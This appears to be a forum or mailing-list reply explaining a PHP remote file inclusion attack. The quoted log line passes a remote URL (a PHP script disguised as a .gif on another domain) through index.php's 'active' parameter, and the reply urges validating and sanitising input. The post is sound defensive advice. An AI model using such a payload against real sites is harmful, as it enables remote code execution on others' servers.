> >>What some was doing was running the following URLs on one of the server's
> >>sites:
> >>http://www.domainname.com/index.php?active=http://www.someotherdomain.com/filename.gif
So what you need to do is look at index.php and see what it's doing
with the "active" parameter. Like others have said, it's blindly
pulling in the file that is passed to it and "executing" it (including
it into the PHP code being run). The hacker is being clever and
naming the PHP script with a .gif file type to make it look innocent,
but index.php doesn't care about that.
Once index.php gets the 'active' parameter value, there should be a
bunch of cleansing and validating of the data being passed in before
doing anything else with it. Always assume that every value being
passed in is the most heinous evil attack script imaginable, so you
want to take extra care to sanitize it before touching or using it to
redisplay via a web page or execute as code, etc.